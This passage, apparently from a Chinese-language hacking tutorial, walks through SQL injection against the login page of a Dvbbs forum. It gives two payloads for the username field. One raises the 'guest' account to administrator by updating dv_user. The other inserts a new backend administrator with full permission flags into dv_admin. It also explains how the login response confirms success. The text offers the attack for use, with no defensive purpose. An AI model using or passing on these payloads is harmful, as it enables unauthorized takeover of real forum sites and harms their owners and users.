在使用者名處寫入“';update dv_user set usergroupid=1 where username='guest'--”密碼我就用正确的來寫然後寫好後登陸看到反回的資訊
我們可以看到登陸提示為“本論壇不存在該使用者名”這個就說明我們所提升的帳戶“guest”已經為管理者了。
現在我們已經是前台管理者了。
那麼怎樣才能讓我們的帳戶具有背景權限呢?我們繼續來到login.asp這個登陸頁面。在使用者名處寫入guest';insert into dv_admin (username,password,flag,adduser) values('guset','49ba59abbe56e057','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45','guest')--
![設定1個賬号不能同時在2台電腦登入[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)